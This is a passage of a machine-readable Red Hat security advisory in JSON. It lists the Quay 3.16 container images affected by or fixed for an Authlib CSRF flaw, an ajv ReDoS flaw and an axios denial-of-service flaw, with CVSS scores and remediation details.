"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "Authlib: Authlib: Cross-Site Request Forgery due to improper session management in state storage"
},
{
"cve": "CVE-2025-69873",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-11T19:01:32.953264+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2439070"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "ajv: ReDoS via $data reference",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, the $data option must be enabled and the attacker needs to be able to send a payload with a specially crafted regular expression to the application processing the input. A 31-character payload causes approximately 44 seconds of execution, with each additional character doubling the execution time. Therefore, even a small payload can cause an application to become unresponsive and eventually result in a denial of service. Due to this reason, this flaw has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "RHBZ#2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md",
"url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
}
],
"release_date": "2026-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T15:17:12+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6497"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ajv: ReDoS via $data reference"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:1ab0303614da22f6a9e3005358de62ba1079f90f2410481603eb33b5b2f7db70_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:401ad33f2305b2f3f54823135c9d25531d55936efb7d20ca1dac5b88efc71a28_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:7aa800901c5b9a158fe07c3a632bf95920af918f70753de3ef201d3be7684ca5_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:d8e040decc94bdb06eda60acb11ff111221d059495c706e3dc9cc8c124ec603b_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:0bc25ef16eabd14562b5c15b2f242558ace42865d416820420d669436d9d71ae_arm64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:3559638cc583d4a6e550d3572f9696dc488d8f75d6f7f77c9853c4881d98dd4a_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:39155eb5f845ade84925b763885a363b95ba927e91e2ee76d8df304620b9ac0e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:de5cfa1742d9eed1e2d7b07693559f1cf52eca41fda6cfb83d226cf3f9bafb9e_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1ca15d4a3ec7067bb925e83588e5ac94674e77ba29969cba9137c07bafadc025_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:1d28e4844da6b1bd1e2fbad161ca68494cac166b9fa22b30a558e0d8a3c9d12d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:4b923525f815b87f3375bd5346f8261746d2e172f2f83b4604c558c4d7ae64ee_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:7b90f185ddc5973be1bc4ffd27b785debb1d519cc6c0ea400a7fbbf22dfa2375_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:342f40181bab7dcc4acdbf4d28fa314fc1dd9c9a3e9e99024e7c856f46fd8092_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:af9f4557f46bb29353be32e53f3c49d32d4641859a3ed385e69423a37b04fa03_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:b97e1ced70d68a5ff55dca3fe7962995f7f9559e7305660bdf829cc60e6cb2bd_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:a48e62759aae34528989bef0e959d1e7f8eeac108e3118bbd86e909882e1b775_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:8b059901d52536b850c65e2ed38d136b2cf831dc12af8a2eea71e584fcd49354_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:943935018ddabe868b693b6078580325ec04905fd1cf13553ef7e351427caf14_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:b5e3b47f06c81244340ca599511d221efd830ff31ed15c5c3ab5ea4bbb45388f_s390x",
